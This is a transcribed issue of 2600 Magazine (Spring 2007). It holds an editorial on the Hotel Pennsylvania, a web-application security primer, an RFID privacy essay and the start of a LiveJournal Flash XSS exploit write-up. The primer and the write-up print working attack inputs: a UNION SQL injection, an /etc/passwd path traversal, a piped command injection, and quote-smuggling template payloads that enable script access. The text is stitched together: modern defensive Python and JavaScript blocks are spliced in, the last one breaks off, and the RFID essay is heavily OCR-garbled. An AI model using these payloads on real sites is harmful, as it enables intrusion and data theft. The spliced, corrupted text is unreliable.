
TIDBITS

Challenges ..... 4
Understanding Web Application Security ..... 6
RFID: Radio Freak-me-out Identification ..... 9
Exploiting LiveJournal.com with Clickless SWF XSS ..... 11
Telecom Informer ..... 13
Avoiding Internet Filtering ..... 15
Hacking Your Own Front Door ..... 16
Dorking the DoorKing ..... 18
Security Holes at Time Warner Cable ..... 19
Hacking My Ambulance ..... 20
SSL MITM Attacks on Online Poker Software ..... 24
Hacker Perspective ..... 26
Ripping MMS Streams ..... 29
Backspoofing 101 ..... 30
Can I Read Your Email? ..... 32
Letters ..... 34
Stalking the Signals ..... 48
GoDaddy.com Insecurity ..... 50
Hubots: New Ways of Attacking Old Systems ..... 51
Network Ninjitsu: Bypassing Firewalls and Web Filters ..... 52
Hacking a Major Technical School's Website ..... 54
Covert Communication Channels ..... 55
How to Cripple the FBI ..... 60
Marketplace ..... 62
Puzzle ..... 64
Meetings ..... 66
Please believe us when we say that we don't intentionally set out to cause trouble and mayhem. It somehow seems to always find us.

We started a hacker magazine because it was a subject that was of interest to a number of us and there was a void to be filled. We didn't expect the fascination, fear, obsession, and demonization that followed us, courtesy of everyone from the media to the government, from the Fortune 500 to high school teachers and principals. It just sort of happened that way.

We didn't ask to be thrown into the front lines of the motion picture industry's copyright battles back in 2000. That also just happened because of who we were and what we believed in. There were many thousands that the Motion Picture Association of America could have taken to court for hosting the DeCSS code on their websites. But we somehow epitomized everything the MPAA was against and this made us the perfect target for them. Merely existing apparently was enough.

And by simply being present at various pivotal moments in hacker history where there was nothing for us to do but speak out against various injustices, we again found ourselves being propelled into a position of advocacy and leadership, when really all we were doing was continuing to make the same points on what hacking was and what it was not. Locking people in prison for being overly curious or experimenting on the wrong bits of technology was just wrong, plain and simple. It was a point we had started our very first issue with. And since so few others were saying this out loud, it became our fight once more.

This kind of thing never seems to end. Also in the year 2000 while all eyes were on the Republican National Convention in Philadelphia, it was our own layout artist who was grabbed off the streets and locked up on half a million dollars bail, charged with being a chief ringleader of opposition. The only evidence against him was surveillance footage that showed him walking down a street talking on a cell phone. Needless to say, it didn't stick and, in fact, a lawsuit against the city for this nonsense was quite successful. But even that wasn't the final chapter of the story. Four years later in New York, our editor was also taken off the streets while the Republican National Convention was in that city. This time it seemed to be a random sweep of people who just happened to be standing on a particular block. Again, it provoked widespread outrage and condemnation, as well as all charges being dropped and a lawsuit which continues to be argued in court to this day. But there's still more. Recently a judge ordered the New York Police Department to release internal documents on these events which they had been trying to keep to themselves. These documents started to see the light of day in February of this year. And among the first to be revealed so far is a memo that outlines what one of their biggest fears was. Yes, that's right. Us again. Apparently the NYPD was concerned because not only was our layout artist rumored to be in town (possibly prepared to use his phone again) but he had spoken at a conference directly across the street from where the Republican Convention was to be held. And he had spoken on potential ways of causing mischief and mayhem! So once again we were catapulted to front and center, just for discussing the things that are of interest to us. Even the location of our conferences, held in the same place since 1994, were called into question as being provocative because they were so close to the site of the Republican Convention.

It all almost reads like a bad TV script, where the same characters keep getting launched into the center of attention week after week. In that kind of a setting, this happens because there are only a certain number of characters and the story lines have to be kept interesting and active. In real life, this only serves to demonstrate the threat of actually reaching people who may share your interests and goals. Not only can you change the course of history in accomplishing this but the fear you instill along the way among the powers-that-be might itself also have a profound effect on the outcome. Scary stuff indeed.
Page 4 2600 Magazine
But now we find ourselves yet again in a position where we have no choice but to take a stand and help start something that could have a profound effect on a lot of people. And this time it goes well beyond the hacker community. We learned earlier this year that the site of our conferences mentioned above - New York's historic Hotel Pennsylvania - is set to be demolished. As of this writing, the only opposition to this has been a whole lot of voices in the wilderness with no apparent unity. So once more it appears that our community will have to step up and hopefully make a difference.

Why should we care? Simple. Ever since starting the Hackers On Planet Earth conferences back in 1994, the Hotel Pennsylvania has been our home (with the exception of Beyond HOPE in 1997). It has three major factors going for it: 1) Location - the hotel is directly across the street from the busiest train station in North America and also centrally located in Manhattan; 2) History - the hotel is a fascinating connection to the past, both architecturally and in the many events and people who have been linked together over the decades in its vast hallways; and 3) Cost - the relative cheapness of the hotel is what makes it possible for us to continue to have the conferences in New York City as well as for our attendees from out of town to be able to stay there.

There was one thing that was drummed into our heads over and over again when we were looking to start a major hacker conference in the United States, especially in response to our desire to have it in New York: It was impossible. And to this day it remains impossible that we could hold an event of this size in a city like New York and manage to keep it affordable. But we do it anyway. It's because of a combination of magical ideas, the magical people who come and build it every two years, and the magical place that makes it all possible. This is all most definitely worth preserving.

In the "real world" however, people don't think like this. It all comes down to dollars and cents and how to make the most impressive profit. And those in charge (namely Vornado, the realty firm that happens to own the hotel) felt it would be most profitable to tear down the hotel and replace it with a huge financial tower. Those in the finance industry would no longer have to ride the subway downtown to get to work. Instead they could commute from the suburbs by train, exit Penn Station, and simply walk across the street to their jobs. And everyone leaving Penn Station would wind up being barraged with a "Times Square style" wall of advertising that would replace the ornate entryway of the existing hotel. So the financial industry and the advertisers would be thrilled. But the people who visit New York City would have one less affordable hotel to stay in (the nearly 2000 rooms in Hotel Pennsylvania are often filled year round) and one more historic structure would be destroyed. This doesn't even address the overwhelming belief that such a massive financial structure simply isn't needed with the entire financial district downtown being rebuilt. Were it to be constructed, however, there is little doubt that it would become a heavily guarded fortress with very limited accessibility due to post-9/11 syndrome, in stark contrast to the open and bustling hotel lobby that currently occupies the space.

We know the hotel isn't in the finest of shape. In this age of "bigger is better" and insisting that every modern convenience be within reaching distance at all times, there are many who simply can not handle a place with such Old World decor. But it's still our home and we've grown rather attached to it. Without it, the future of the HOPE conferences would be very much in jeopardy and certainly not as convenient to get to for those from out of town. And this is the key. The majority of people affected by its destruction would likely be people who don't live locally and have probably not even heard of these ominous plans yet. That is something we can change.

We also have to realize that this is so much bigger than our own relatively small community. There are scores of other conferences and literally millions of people who have walked through the doors and gotten something out of the place. By linking as many of them together as possible, we have the potential of uniting forces and, at the very least, speaking out loudly against losing this hotel. It seems as if this has become our obligation. And, as history has shown us, being who you are at a particular place and point in time is sometimes all you need.

The odds are certainly against us. And this is likely to be a fight that we're involved in for quite some time to come. But we believe getting involved in this could be an uplifting experience, one where we truly realize the importance of individual voices brought together in a common cause. There will be lots more on this in the future. For now, we hope you can join us online at http://talk.hope.net to discuss ways to save the hotel (and plan for future HOPE conferences) in a lively forum environment. And we hope everyone can help us spread the word.
Spring 2007 Page 5
Understanding Web Application Security
by Acidus
acidus@msblabs.org
Most Significant Bit labs (http://www.msblabs.org)
Web applications are complex services running on remote systems that are accessed with only a browser. They have multiple attack vectors and this article is by no means a comprehensive guide. Today I will discuss what web applications are, how they work, discuss common attack methods, provide brief examples of specific attacks, and discuss how to properly secure a web application.

What do I mean by web application? A web application is a collection of static and dynamically generated content to provide some service. Maybe it's Wikipedia providing an ever-updating knowledge base or Amazon providing a commerce portal. These applications can span multiple domains, such as Wachovia's online banking system. As you can see in Figure 1, web applications have multiple parts. There is a program used to access the web application known as a user agent. There is a JavaScript logic layer which allows very limited code to execute on the client's machine. This is important because sending requests across the Internet cloud to the server is expensive in terms of time and lag. There is a web server which has some kind of server logic layer. This layer uses inputs from the client such as cookies or parameter values to dynamically generate a response. Usually this response is composed of data stored in a back end database. This database is maintained and populated by various programs like web crawlers and admin scripts.

Web applications are not a passing fad. Major companies like Amazon, eBay, Google, Salesforce.com, and UPS all use complex web applications with several deriving all their income from them. Many more companies are developing web apps strictly for internal use. The cost benefits of having an application that is centrally managed and can be accessed by any browser regardless of the underlying OS are simply too great to ignore. With their place in the online landscape assured it is essential for hacker and security professional alike to understand fundamental security risks of a web application.

As you can see web applications differ from traditional applications in that they exist on numerous tiers and span multiple disciplines. Programmers, internal web designers, graphic artists, database admins, and IT admins are all involved. It's easy for things to slip through the cracks because people assume a task is someone else's responsibility. This confusion gap is ripe for vulnerabilities.
[Figure 1: the parts of a web application (user agent, JavaScript logic layer, web server with its server logic layer, back end database, backend processes); only the label "Backend Processes" survived extraction]
Attacking web applications is a lot like being a detective. The structure of the application contains your clues. From them you learn information about its structure, if the application is using pre-made components (like phpBB), what its inputs are, and what types of resources are available. You also have a list of witnesses you can ask to get information not directly available from the site. These are your search engines. How often is the site updated? Does the IT staff ask questions on newsgroups or forums? Are there any known vulnerabilities against any of the application's components? This is just basic system fingerprinting, only you are fingerprinting an application instead of a system.

Web application attacks fall into two categories: resource enumeration and parameter manipulation.

Resource Enumeration
Resource enumeration is all about accessing resources that the web application doesn't publicly advertise. By this I mean resources that exist but have no links to them anywhere in the web application.

The first way to execute resource enumeration is based on things you already know about the application. If Checkout.php exists, make a request for Checkout.bak or Checkout.php.old. If you succeed you'll get a copy of the PHP source code complete with database connection strings and passwords.

In addition to what files are present in the application, you also know about the structure. Suppose there is a resource like "/users/acidus/profiles/bookmarks.php". After trying various permutations of bookmarks.zip and such, sending a request for "/users/" could return something interesting. Perhaps it's a directory listing, or it serves an older default page. Regardless, you will find links to resources that might not be mentioned elsewhere on the site. While web servers can be configured to deny access to directories, this setting can be global or specific to a folder group. Any settings can also be overridden on a per folder basis. Just because "/users/" or "/users/acidus/" don't work doesn't mean "/users/acidus/profiles/" won't work. Always send requests for every directory you see.

Once you've sent requests for resources based on things you know, you should simply guess for resources. "/test.aspx", "/temp.php", and "/foo.html" are good ones. You could try "db.inc", "password.txt", or "website.zip". The directories "/admin/", "/stats/", and "/pr0n/" are good ideas too. A comprehensive list of files and directories to guess is beyond the scope of this article.

Parameter Manipulation
Parameter manipulation involves modifying the value of inputs trying to make the application act in ways the designers never intended. We have all seen a site with a URL like "site.com/story.php?id=1732". The "id" input specifies which resource to serve up. Modifying this value allows access to different stories that might not normally be available. This includes things like archived/deleted items or future/unpublished items. This technique is known as "value fuzzing" and is quite useful.

What if we send a request with "id=-1"? Chances are the application will return an error. However the error might contain information that is useful. Things like the filesystem path for that resource. Maybe we'll get some information about what database the application tried to contact or even information about the structure of that database! Perhaps we'll get a stack trace that will show what functions the program is calling or even the values of the parameters. This technique is known as "edge case testing" or "bounds testing." Programmers commonly forget to deal with edge cases so this area is ripe for vulnerabilities.

There are several attacks which are really just specific examples of parameter manipulation. We will discuss SQL Injection, Command Execution, and Cross Site Scripting.

SQL Injection
Almost all complex web applications, from Amazon to TinyURL, have a back end database. The inputs you supply the web application when you request a resource are eventually converted into some kind of SQL statement to extract content from this back end database. Depending on how well the inputs are filtered you can get arbitrary SQL statements to run on this back end database. It is best to show an example. Suppose we discover a URL like "/ShowItem.php?id=2710". Chances are 2710 is the primary key in some kind of product table in the database. Let's say in the PHP we have an SQL statement that looks like "SELECT * FROM Products WHERE prodID = " + id. This is called a concatenated query string and is vulnerable to SQL Injection. If I send 2710 UNION ALL SELECT * FROM Customers the resulting SQL statement is SELECT * FROM Products WHERE prodID = 2710 UNION ALL SELECT * FROM Customers. This statement will return the product information for product 2710 and all the records in the Customers table (assuming it exists). This is simply one example of SQL injection. See [1] and [2] for more information.

SQL injection is a big problem. The Paris Hilton/T-Mobile hack didn't happen because someone sniffed the phone's traffic. T-Mobile's website had an interface to allow subscribers access to their address books. This means the website had to touch the database that stores contact information. An attacker found an input they could exploit and dumped out several address books through the T-Mobile web page using SQL injection.

Command Execution
Many times there are applications that are executed on a web server simply by visiting a page. For example, nslookup, whois, finger, ping, traceroute, uptime, who, last, and cat can be found in so-called application gateways. This is where a web page receives input from the user and passes it to a native application, returning the output. These gateways are quite common and were among the first uses of web pages and CGI. Here is an actual Perl script I've seen in the wild which serves pages:

use CGI qw(param);      # assumed import: param() comes from CGI.pm, not shown in the script as printed
$res = param('file');   # value taken straight from the query string, with no checks at all
open (FIN, $res);       # two-argument open: a trailing "|" makes Perl run $res as a command
@FIN = <FIN>;
foreach $fn (@FIN) { print "$fn\n" }

A request for "/cgi-bin/file.cgi?file=contact.html" will return the contents of the file. First of all I can see one vulnerability that isn't even a command execution. Making a request for "/cgi-bin/file.cgi?file=../../../etc/passwd" will give you the Unix password file. Further, the open command supports the use of pipes. Pipes allow a command to be executed and its output sent to another program. A request for "/cgi-bin/file.cgi?file=nmap -v|" will execute nmap on the server if it exists! This happens because the open function will execute the nmap command for you and the pipe means the open function reads the output from "nmap -v" as if it were a file. See [3] and [4] for more information.

Cross Site Scripting
Cross Site Scripting (XSS) is a mechanism to inject JavaScript into the web page that is returned to the user. Consider the simplest example, as shown in Figure 2. The web application has a personalized greetings page. The key to the vulnerability is that the input parameter name is reflected into the page that is returned to the user. As Figure 3 shows, if I insert a block of JavaScript it too is returned to the user. So what can you do with JavaScript? You can steal cookies, hijack sessions, log keystrokes, capture HTML traffic (aka screen scraping), and many other things. See [5] and [6] for more information about nasty things JavaScript can do. See [7] for a case study using XSS and AJAX to make malicious requests as another user.

[Figure 2: the greetings page reflects the name parameter into its response, e.g. <h1>Hello there Billy!</h1>]

[Figure 3: the same page with a block of JavaScript supplied as the name parameter; the script is reflected into the response unchanged]

XSS can also get injected into the back end database of a website, commonly through forum posts, member profiles, and custom stock tickers. This is especially nasty since the XSS will affect many more people. There are many avenues to launch XSS attacks. [8] provides a detailed look at the different XSS mechanisms and defensives.

As you can see XSS is an extremely complex topic and I've only brushed the surface. Due to technologies like AJAX and the fact that everyone is using standards compliant browsers the danger of XSS is much higher than it was when XSS was originally discovered in 2000. For some of the really nasty stuff, see my Black Hat Federal presentation [9].

Defensives
Almost all web application attacks can be stopped by validating or filtering the inputs of the application. SQL injection isn't possible if your numeric inputs only contain numbers. XSS attacks are not possible if you don't allow a subset of a markup language in your input. A well placed regex can save you a lot of headache if it's in the proper place. Just because you have client side JavaScript to validate input values doesn't mean you're protected. I can always directly connect to your application and completely bypass your filters. Always implement filters on the server side! Your mantra should be "never trust anything I get from the client." Everything you get from the client including cookies, query strings, POST data, and HTTP headers can all be faked. Always make sure you implement some kind of length restriction on your field too. Otherwise someone might implement a filesystem on top of your web application [10]!
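The concatenated ShowItem.php query, the reflected greetings page, and the server-side filtering the Defensives section calls for, rebuilt as an added Python example (not the article's code) against an in-memory SQLite database; the Products and Customers tables and their rows are constructed, and the UNION ALL payload is the one from the SQL Injection section.

```python
import html
import re
import sqlite3

# Constructed sample schema modelled on the article's Products and Customers
# tables. UNION ALL needs matching column counts, so both tables have two.
conn = sqlite3.connect(":memory:")
conn.executescript(
    """
    CREATE TABLE Products (prodID INTEGER, name TEXT);
    CREATE TABLE Customers (custID INTEGER, email TEXT);
    INSERT INTO Products VALUES (2710, 'Blue widget');
    INSERT INTO Customers VALUES (1, 'alice@example.invalid');
    INSERT INTO Customers VALUES (2, 'bob@example.invalid');
    """
)

# The payload the article sends as the id parameter of /ShowItem.php
UNION_PAYLOAD = "2710 UNION ALL SELECT * FROM Customers"
# A constructed reflected-XSS input for the greetings page
XSS_PAYLOAD = "Billy<script>alert(1)</script>"

ID_PATTERN = re.compile(r"[0-9]{1,10}")  # digits only, with a length cap


def show_item_vulnerable(item_id: str) -> list:
    """Concatenated query string, the pattern the article calls vulnerable:
    whatever the client sent becomes part of the SQL text."""
    sql = "SELECT * FROM Products WHERE prodID = " + item_id
    return conn.execute(sql).fetchall()


def is_valid_id(item_id: str) -> bool:
    """Server-side filter: a numeric input may only contain numbers."""
    return ID_PATTERN.fullmatch(item_id) is not None


def show_item_hardened(item_id: str) -> list:
    """Validated input plus a parameterized query: the driver binds the value,
    so it is never parsed as SQL even if the validation is later loosened."""
    if not is_valid_id(item_id):
        raise ValueError("invalid product id")
    sql = "SELECT * FROM Products WHERE prodID = ?"
    return conn.execute(sql, (int(item_id),)).fetchall()


def greet_vulnerable(name: str) -> str:
    """Reflects the name parameter straight into the page (Figure 2)."""
    return "<h1>Hello there " + name + "!</h1>"


def greet_hardened(name: str, max_len: int = 40) -> str:
    """Length-limits the field and HTML-escapes it, so markup in the input is
    shown as text instead of being interpreted by the browser."""
    if len(name) > max_len:
        raise ValueError("name too long")
    return "<h1>Hello there " + html.escape(name, quote=True) + "!</h1>"


def demo() -> dict:
    """Run both pairs and report what each version does with the payloads."""
    try:
        show_item_hardened(UNION_PAYLOAD)
        union_rejected = False
    except ValueError:
        union_rejected = True
    return {
        # vulnerable: the product row plus every Customers row (3 rows in total)
        "vuln_rows": len(show_item_vulnerable(UNION_PAYLOAD)),
        # hardened: the same product lookup returns only the product row
        "safe_rows": len(show_item_hardened("2710")),
        "union_rejected": union_rejected,
        "vuln_html": greet_vulnerable(XSS_PAYLOAD),
        "safe_html": greet_hardened(XSS_PAYLOAD),
    }


if __name__ == "__main__":
    for key, value in demo().items():
        print(f"{key}: {value}")
```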
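The defender's view of the Resource Enumeration, Parameter Manipulation, and Command Execution probes described above, as an added example that is not part of the article: a small parser that reads access-log lines and flags backup-file requests, guessed resources, directory walking, id fuzzing, and traversal or pipe characters in the file.cgi parameter. The log lines, addresses, and the directory-walk threshold are constructed for the example.

```python
import re
from collections import defaultdict
from urllib.parse import parse_qs, unquote, urlsplit

# Constructed Common Log Format lines; addresses and paths are made up, the
# probes mirror the ones the article walks through.
SAMPLE_LOG = """\
10.0.0.5 - - [01/Mar/2007:10:00:01 -0500] "GET /Checkout.php HTTP/1.1" 200 5120
10.0.0.5 - - [01/Mar/2007:10:00:02 -0500] "GET /Checkout.bak HTTP/1.1" 404 210
10.0.0.5 - - [01/Mar/2007:10:00:03 -0500] "GET /Checkout.php.old HTTP/1.1" 200 4890
10.0.0.5 - - [01/Mar/2007:10:00:04 -0500] "GET /users/ HTTP/1.1" 403 180
10.0.0.5 - - [01/Mar/2007:10:00:05 -0500] "GET /users/acidus/profiles/ HTTP/1.1" 200 1200
10.0.0.5 - - [01/Mar/2007:10:00:06 -0500] "GET /admin/ HTTP/1.1" 404 210
10.0.0.5 - - [01/Mar/2007:10:00:07 -0500] "GET /story.php?id=-1 HTTP/1.1" 500 640
10.0.0.5 - - [01/Mar/2007:10:00:08 -0500] "GET /cgi-bin/file.cgi?file=../../../etc/passwd HTTP/1.1" 200 1800
10.0.0.5 - - [01/Mar/2007:10:00:09 -0500] "GET /cgi-bin/file.cgi?file=nmap%20-v| HTTP/1.1" 200 2200
10.0.0.9 - - [01/Mar/2007:10:00:10 -0500] "GET /story.php?id=1732 HTTP/1.1" 200 3100
"""

LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>\S+) (?P<target>\S+) \S+" (?P<status>\d{3}) (?P<size>\S+)$'
)

# Extensions the article suggests trying against a known script name
BACKUP_SUFFIXES = (".bak", ".old", ".orig", ".zip", ".inc", "~")
# Resources the article lists as common blind guesses
GUESSED_PATHS = {
    "/test.aspx", "/temp.php", "/foo.html", "/db.inc", "/password.txt",
    "/website.zip", "/admin/", "/stats/",
}


def classify(target: str) -> list:
    """Return the probe types one request target matches (empty if benign)."""
    parts = urlsplit(target)
    path = unquote(parts.path).lower()
    findings = []
    if path.endswith(BACKUP_SUFFIXES):
        findings.append("backup-file")
    if path in GUESSED_PATHS:
        findings.append("guessed-resource")
    # parse_qs already URL-decodes the values it returns
    for key, values in parse_qs(parts.query, keep_blank_values=True).items():
        for value in values:
            if key == "id" and re.fullmatch(r"[0-9]+", value) is None:
                findings.append("id-fuzzing")       # e.g. id=-1 bounds testing
            if ".." in value or "/etc/" in value:
                findings.append("path-traversal")   # file=../../../etc/passwd
            if "|" in value or ";" in value:
                findings.append("shell-metachar")   # file=nmap -v| style pipe
    return findings


def analyze(log_text: str) -> dict:
    """Aggregate findings per client; several categories from one address in a
    short window is the fingerprinting phase the article describes."""
    per_client = defaultdict(lambda: defaultdict(int))
    dir_requests = defaultdict(int)
    for line in log_text.splitlines():
        match = LOG_RE.match(line)
        if match is None:
            continue  # tolerate lines that do not parse instead of crashing
        ip, target = match.group("ip"), match.group("target")
        for finding in classify(target):
            per_client[ip][finding] += 1
        if urlsplit(target).path.endswith("/"):
            dir_requests[ip] += 1
    # Requesting several bare directories is the "send requests for every
    # directory you see" step; two or more is the constructed threshold here.
    for ip, count in dir_requests.items():
        if count >= 2:
            per_client[ip]["directory-walk"] = count
    return {ip: dict(findings) for ip, findings in per_client.items()}


if __name__ == "__main__":
    for ip, findings in analyze(SAMPLE_LOG).items():
        print(ip, findings)
```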
Conclusions
I hope this article served as a nice primer on all the issues surrounding web application security. It's a complex field and I encourage you to check the cited works to learn more.

There is no group, there is only code.
References
[1] SQL Injection Whitepaper (http://www.spidynamics.com/spilabs/education/whitepapers/SQLinjection.html) Examples of SQL injection.
[2] Blind SQL Injection Whitepaper (http://www.spidynamics.com/assets/documents/Blind_SQLInjection.pdf) Examples of Blind SQL Injection where you don't have ODBC error messages to help you craft attacks.
[3] Web Security and Privacy (http://www.oreilly.com/catalog/websec2/index.html) A rather dated O'Reilly book that has an excellent security section in chapter 16.
[4] Perl CGI Security Notes by Chris (http://www.xed.ch/lwm/securitynotes.html) Well written page going into many more command execution issues with Perl than I covered.
[5] XSS-Proxy (http://xss-proxy.sf.net) XSS-Proxy shows how JavaScript can be used to monitor keystrokes and can receive third party commands.
[6] Phuture of Phishing (http://www.msblabs.org/talks/) Shows some of the nasty things you can do with XSS and how XSS can facilitate phishing.
[7] MySpace.com Virus (http://namb.la/popular/tech.html) Technical details of the MySpace.com virus as told by the author. Shows how XSS attacks can be augmented by AJAX.
[8] Real World XSS (http://sandsprite.com/Sleuth/papers/RealWorld_XSS_1.html) An excellent paper discussing all aspects of the XSS risk.
[9] Web Application Worms and Viruses (http://www.spidynamics.com/spilabs/education/presentations/billyhoffman-web_appworms_viruses.pdf) Details self propagating web malware and shows some very nasty implications of XSS.
[10] TinyDisk (http://www.msblabs.org/tinydisk/) Implementing an application on top of someone else's web application.
RFID: Radio Freak-me-out Identification
by KnightlOrd
KnightlOrd@knightlOrd.org
RFI D has become something of a hot
topi c i n the hacki ng wor l d. There have heen
mu l t i pl e presentations on securi ty and pr i vacy
of RFI D and al so the technol ogy heh i nd it.
Th i s articl e is des i gned to be a what-if type
scenar i o on what RFI D is potent i al l y capahl e
of and where the technol ogy i s headi ng.
RFI D stands for Radi o Frequency I den
t i ficati on whi ch obvi ousl y means i denti
fyi ng objects us i ng radio frequency. Current
i mpl ementations i nclude aset management,
i nventory control , i nventory tracking, access
control , and enti ty i denti fi cat i on. The fi rst
three are usuall y i mpl emented i n a busi
ness envi ronment to track i nventory from
one l ocati on to another or IC mon i tor asset
activity to isol ate theft si tuat i ons and probl em
areas . These i mpl ementat i ons of RFI D are
very effi ci ent and perform a val uabl e task for
Spring 2007Pge 9
a business. The fourth exampl e is not so good.
RFI D is being changed into a new type of I D
for peopl e a n d animal s t o be used instead of
a hard-copy form of identification . This may
seem convenient for peopl e and they don't
see why this is bad. There are many possi
bil ities for this technol ogy to t ur n our wor l d
upside down and al l ow for Bi g Brother to
tru l y manifest itsel f.
Currently a human being can receive an implanted RFID chip that stores an identification number that associates them with information in a database. This can be anything from personal data such as name, address, and birth date to medical history, financial information, family information, etc. The cost of storage space now is so cheap that it wouldn't be out of the question to store just about every type of information on any one person so that any organization can utilize the technology embedded in said person. If you don't get where I am going with this, then think of a massive database with information on every person that has an implanted tag. Now you may say, what is the big deal? There are already databases out there with our information. Why should one more be any different? Well, the problem is this. Any database that contains that vast amount of information has to be controlled by someone. More than likely that someone will be the government. This may not seem so scary either. But wait, there is more.
The possibilities are then endless for the data and scenarios that the government can observe. Not only can the government observe this information, but so can anyone else who can figure out how to get the data off the tags. Since our country is basically run by huge retail outlets, it is not too far of a stretch to see product marketing analysis based on human purchase activity which is all based on RFID technology. Picture walking into Wal-Mart and having the racks scan your RFID tags and create some kind of notice to point you to items that you prefer based on past purchase history. You regularly buy black cotton t-shirts in size large, so the rack will recognize this data and highlight the rack with the black cotton t-shirts with little lights attached to all the hangers that flash as you approach. The same can be said about shoes. You wear a size 13, so it shows you only the size 13 shoes in stock. Now take it one step further and say you purchase one of those pairs of shoes. The shoes themselves have an RFID tag embedded in them, so now not only can we see where you are going based on the implanted RFID tag, but we can also see that you bought your shoes from Wal-Mart and produce Wal-Mart advertising on interactive billboards as you pass by.
When you walk into a coffee shop they will already start making your favorite coffee because they got that information from your tag. This may seem cool, but then they ask you how your mother is doing because they saw on the report that she had come down with an illness and had to go to the hospital the day before, and they now have her taking penicillin for an infection. That thought in itself is pretty scary. You don't want your local coffee house to know everything about you, do you? How can you even make a small decision like whether you want cream or not if they already know, based on trends they have analyzed in your activity for the last fiscal year?
When everyone becomes a number we will see the true possibilities of this technology. A wealth of knowledge is attached to you and that information is accessible by way too many people for it not to be a little scary. There are good things that can come out of this, but is convenience better than privacy or free will? I think not.
RFID in its current implementations has been proven to be a reliable solution for tracking inventory. Change the word inventory to humans and you see the problem. The technology does not change from one implementation to the other. The data on the tag may change somewhat, but the fundamentals do not. So what is stopping the government from placing readers on every government-owned piece of property and monitoring the activities of everyone with an implanted tag? Not a whole lot. Right now the cost for a reader is about $40 to $120 for an LF (low frequency) module. The government, being its omnipresent self, can get these devices for less or manufacture them for less and tailor the technology to act as it wishes. The cost for an implant is around $20 for the tag plus the cost of implantation, which can vary from one doctor to another. There is not a whole lot stopping the government from doing this.
Exploiting LiveJournal.com with Clickless SWF XSS
by Zaphraud
This article will focus on a clickless SWF XSS exploit of LiveJournal.com and the importance of:
- Learning from the past.
- Auditing all errors to at least determine what caused them.
- Last but not least, the ultimate form of code auditing: using your program while intoxicated, to simulate a "regular" user.
As of 6-October-2006 LiveJournal staff closed this vulnerability in the video template system.
Recent Background
A few months ago, LiveJournal joined other blogging sites in supporting video content for its members. Initially, the template system was used. Later, support was also added for simply pasting OBJECT-style code from YouTube or Photobucket. Focus here is on the template system, which works as follows using a URL pasted in from one of the two allowable services, YouTube or Photobucket:
<lj-template name="video">http://www.youtube.com/watch?v=d3PyLe6sivE</lj-template>
The very first thing that crossed my mind when I saw this was "Gee, I bet they are only checking domain names." I proceeded to post an entry on August 2nd featuring a small Mozilla banner that I had uploaded to Photobucket for the purpose of testing this. The post is at acpizza.livejournal.com/499638.html and uses the following snippet:
<lj-template name="video">http://img.photobucket.com/albums/v510/zaphraud/misc/mozilla.swf</lj-template>
On 13-September-2006, I discovered a hilarious meme while drunk and posted another entry at acpizza.livejournal.com/501921.html and made the mistake of putting quotes around the URL, as follows:
<lj-template name="video">"http://img.photobucket.com/albums/v510/zaphraud/Funny/longcat.swf"</lj-template>
It didn't work and I edited it to fix it. Bear in mind that I was drunk, so once I figured out what I did wrong by looking at previous examples, is it any surprise that I ended up with:
<lj-template name="video">http://img.photobucket.com/albums/v510/zaphraud/Funny/longcat.swf"</lj-template>
after "fixing" the problem? Notice I drunkenly left a quote at the end?
What happened next is key: Instead of properly breaking with the normal LiveJournal error when HTML is all screwed up [Error: Irreparable invalid markup ('whatever was bad') in entry. Owner must fix manually. Raw contents below.], I saw the word OBJECT on one side and a quote and a . on the other side, with a working video in the middle, presumably from the EMBED tag.
Yes, as it turns out from viewing the source, it was possible to pass parameters to the flash. Initially I played with this in the following manner:
<lj-template name="video">http://img.photobucket.com/albums/v510/zaphraud/Funny/zeldazvO.swf"height="1"width="1</lj-template>
Spaces in the URL are disallowed. However, by quoting parameters, separation of arguments is preserved. This one pixel "video" is actually a hummed rendition of the Zelda theme song, which as you can imagine is quite capable of making people confused when it ends up posted in a LiveJournal community, or a message comment, as there is not really any way to tell where exactly it came from short of viewing the source. At some point, a photobucket-hosted meatspin.swf was posted to a community, but a moderator deleted it rapidly.
Perhaps because of people getting used to MySpace profiles that are every bit as
annoying as late 1990s Geocities web pages, abuse of this function went underreported. Clearly, something larger was needed in order to get this problem fixed. It was time to reopen a can of Exxon Seal Remover....
<lj-template name="video">http://img.photobucket.com/(some url).swf"height="1"width="1"AllowScriptAccess="always</lj-template>
The AllowScriptAccess attribute allows JavaScript to be run from Flash.
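As an added illustration (this is not LiveJournal's code, whose implementation the article never shows), the JavaScript below puts a template renderer in the shape the article describes, one that checks only the host name and drops the raw URL into an attribute, next to a hardened version. The host allow-list, the function names and the two sample inputs are constructed for the example. The hardened form rejects anything that is not plain URL syntax, parses the URL, requires http(s) to an allow-listed host with no embedded credentials, escapes the attribute, and emits allowScriptAccess itself so that user input can never supply it.

```javascript
// Added example, not LiveJournal's code. Host names, function names and the
// sample inputs are constructed for illustration.

const ALLOWED_HOSTS = new Set(["www.youtube.com", "img.photobucket.com"]);

// Characters that can legitimately appear in an absolute URL. A double quote,
// a space, '<', '>' or a backslash never belongs in one, and a quote is exactly
// what the article used to break out of the src attribute.
const URL_CHARS = /^[A-Za-z0-9\-._~:\/?#@!$&'()*+,;=%]+$/;

function hostOf(url) {
  return url.replace(/^https?:\/\//i, "").split(/[\/?#]/)[0].toLowerCase();
}

// Vulnerable shape: the host is checked, then the untouched string is
// interpolated into src="...". A quote inside the URL closes the attribute
// and everything after it is parsed by the browser as further EMBED attributes.
function renderVideoVulnerable(url) {
  if (!ALLOWED_HOSTS.has(hostOf(url))) return null;
  return `<embed src="${url}" type="application/x-shockwave-flash"></embed>`;
}

function escapeAttr(s) {
  return s.replace(/&/g, "&amp;").replace(/"/g, "&quot;")
          .replace(/</g, "&lt;").replace(/>/g, "&gt;");
}

// Hardened: reject anything that is not plain URL syntax, parse with the URL
// class, allow only http(s) to an allow-listed host with no credentials,
// serialise only the parsed components, escape the attribute, and emit the
// security-relevant attributes server-side so input cannot override them.
function renderVideoHardened(url) {
  if (typeof url !== "string" || !URL_CHARS.test(url)) return null;
  let u;
  try { u = new URL(url); } catch (e) { return null; }
  if (u.protocol !== "http:" && u.protocol !== "https:") return null;
  if (u.username || u.password) return null;
  if (!ALLOWED_HOSTS.has(u.hostname)) return null;
  const src = escapeAttr(u.href);
  return `<embed src="${src}" type="application/x-shockwave-flash" ` +
         `allowScriptAccess="never" allowNetworking="internal" ` +
         `width="425" height="350"></embed>`;
}

// Constructed inputs: a benign URL and the quote-smuggling shape from the article.
const BENIGN = "http://img.photobucket.com/albums/example/banner.swf";
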